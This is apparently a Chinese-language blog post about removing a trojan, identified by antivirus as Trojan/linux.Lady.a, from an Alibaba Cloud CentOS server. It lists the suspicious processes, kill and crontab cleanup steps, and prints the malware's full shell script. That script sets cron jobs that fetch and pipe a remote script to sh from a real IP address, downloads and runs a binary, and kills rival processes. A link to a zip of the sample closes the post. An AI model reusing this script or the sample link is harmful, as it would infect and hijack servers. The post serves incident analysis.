系统:CentOS
平台:阿里云

说明

通过 top 查看,CPU 资源消耗居然不大,就是 wa 内存占用飙升;找到两个可疑进程:

1
2
2354 root      20   0  183000  48876      0 S   2.3   2.6   0:44.26 /usr/bin/omasfa8
2467 root 20 0 2432780 1.4g 236 S 0.7 76.4 0:47.75 /tmp/Donald

操作

1.使用 kill -9 PID 强制杀掉进程;
2.使用 rm -rf /usr/bin/omasfa8||/usr/libexec/omasfa8||/usr/local/bin/omasfa8||/tmp/Donald 删除可能遗留存的路径;

  1. crontab -r 删除定时任务或者 crontab -e 编辑定时任务。

    木马

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/root
    echo "*/15 * * * * (/usr/bin/omasfa8||/usr/libexec/omasfa8||/usr/local/bin/omasfa8||/tmp/omasfa8||curl -fsSL -m180 http://140.143.145.178:7478/i.sh||wget -q -T180 -O- http://140.143.145.178:7478/i.sh) | sh" >> /var/spool/cron/root
    cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

    cd /tmp
    touch /usr/local/bin/writeable && cd /usr/local/bin/
    touch /usr/libexec/writeable && cd /usr/libexec/
    touch /usr/bin/writeable && cd /usr/bin/
    rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

    export PATH=$PATH:$(pwd)
    ps auxf | grep -v grep | grep omasfa8 || rm -rf omasfa8
    if [ ! -f "omasfa8" ]; then
    curl -fsSL -m1800 http://140.143.145.178:7478/static/4008/ddgs.$(uname -m) -o omasfa8||wget -q -T1800 http://140.143.145.178:7478/static/4008/ddgs.$(uname -m) -O omasfa8
    fi
    chmod +x omasfa8
    /usr/bin/omasfa8||/usr/libexec/omasfa8||/usr/local/bin/omasfa8||/tmp/omasfa8

    ps auxf | grep -v grep | grep omasbcb | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasbcc | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasbcd | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasbce | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasfa0 | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasfa1 | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasfa2 | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasfa3 | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep omasfa4 | awk '{print $2}' | xargs kill -9

    echo "*/15 * * * * (/usr/bin/omasfa8||/usr/libexec/omasfa8||/usr/local/bin/omasfa8||/tmp/omasfa8||curl -m180 -fsSL http://140.143.145.178:7478/i.sh||wget -q -T180 -O- http://140.143.145.178:7478/i.sh) | sh" | crontab -
    大致思路是:按机器硬件名下载相应的程序,写入 omasfa8 然后运行并定时检查。
    将下载的运行程序拷贝到 Windows 下用火绒扫描提示木马病毒:Trojan/linux.Lady.a;
    https://yun.yuwei.cc/Trojan/ddgs.zip